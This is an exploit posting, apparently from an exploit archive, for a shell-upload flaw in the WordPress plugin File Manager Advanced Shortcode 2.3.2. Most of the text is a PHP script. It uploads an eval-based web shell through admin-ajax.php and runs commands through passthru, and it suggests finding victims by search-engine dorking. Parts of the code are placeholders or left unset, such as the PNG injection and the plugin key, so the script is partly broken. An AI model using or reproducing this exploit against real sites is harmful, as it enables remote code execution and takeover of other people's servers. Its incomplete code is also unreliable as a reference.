WordPress File Manager Advanced Shortcode 2.3.2 Code Injectin / Shell Upload

`=============================================================================================================================================  
| # Title : WordPress File Manager Advanced Shortcode 2.3.2 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://advancedfilemanager.com/product/file-manager-advanced-shortcode-wordpress/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 106 set your target .  
  
[+] save code as poc.php .  
  
[+] USage : cmd => c:\www\test\php poc.php   
  
[+] PayLoad :  
  
  
<?php  
  
class MetasploitModule {  
  
private $targetUri;  
private $webshellName;  
private $wpData;  
private $uploadPath;  
private $postParam;  
private $getParam;  
  
public function __construct($targetUri, $webshell = null, $command = 'passthru') {  
$this->targetUri = $targetUri;  
$this->webshellName = $webshell ?: $this->generateRandomWebshellName();  
$this->postParam = $this->generateRandomString();  
$this->getParam = $this->generateRandomString();  
}  
  
private function generateRandomWebshellName() {  
return bin2hex(random_bytes(rand(8, 16))) . '.php';  
}  
  
private function generateRandomString($length = 8) {  
return bin2hex(random_bytes($length));  
}  
  
private function getFormData($pngWebshell) {  
// Construct multipart form data  
$boundary = md5(time());  
$formData = "--$boundary\r\n";  
$formData .= "Content-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n";  
$formData .= "--$boundary\r\n";  
$formData .= "Content-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n";  
$formData .= "--$boundary\r\n";  
$formData .= "Content-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n";  
$formData .= "--$boundary\r\n";  
$formData .= "Content-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n";  
$formData .= "--$boundary\r\n";  
$formData .= "Content-Disposition: form-data; name=\"_fmakey\"\r\n\r\n{$this->wpData['fmakey']}\r\n";  
$formData .= "--$boundary\r\n";  
$formData .= "Content-Disposition: form-data; name=\"path\"\r\n\r\n{$this->uploadPath}\r\n";  
$formData .= "--$boundary\r\n";  
$formData .= "Content-Disposition: form-data; name=\"upload[]\"; filename=\"{$this->webshellName}\"\r\n";  
$formData .= "Content-Type: image/png, text/x-php\r\n\r\n" . $pngWebshell . "\r\n";  
$formData .= "--$boundary--\r\n";  
  
return ['data' => $formData, 'boundary' => $boundary];  
}  
  
private function uploadWebshell($pngWebshell) {  
$formData = $this->getFormData($pngWebshell);  
$response = $this->sendRequest('POST', "/wp-admin/admin-ajax.php", $formData['data'], [  
"Content-Type: multipart/form-data; boundary={$formData['boundary']}"  
]);  
  
// Handle response and check for upload success  
$responseData = json_decode($response, true);  
if (isset($responseData['added'][0]['name']) && $responseData['added'][0]['name'] == $this->webshellName) {  
return true;  
}  
  
return false;  
}  
  
private function injectPhpPayloadPng($payload) {  
// Here you should inject PHP code into a PNG file  
// This is just a placeholder for the actual implementation  
return $payload; // Placeholder for the injected PNG  
}  
  
private function executeCommand($cmd) {  
$payload = base64_encode($cmd);  
$this->sendRequest('POST', "/{$this->wpData['baseurl']}/{$this->uploadPath}/{$this->webshellName}", [  
$this->getParam => 'passthru', // replace with the command function  
$this->postParam => $payload  
]);  
}  
  
private function sendRequest($method, $uri, $data, $headers = []) {  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, $this->targetUri . $uri);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);  
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);  
if ($method == 'POST') {  
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);  
}  
$response = curl_exec($ch);  
curl_close($ch);  
return $response;  
}  
  
public function exploit() {  
// Check for vulnerabilities and upload webshell logic  
$payload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";  
$pngWebshell = $this->injectPhpPayloadPng($payload);  
if ($this->uploadWebshell($pngWebshell)) {  
$this->executeCommand('whoami'); // Replace 'whoami' with your desired command  
} else {  
echo "Failed to upload webshell.";  
}  
}  
}  
  
// Usage example  
$exploit = new MetasploitModule('http://target-uri.com');  
$exploit->exploit();  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================  
`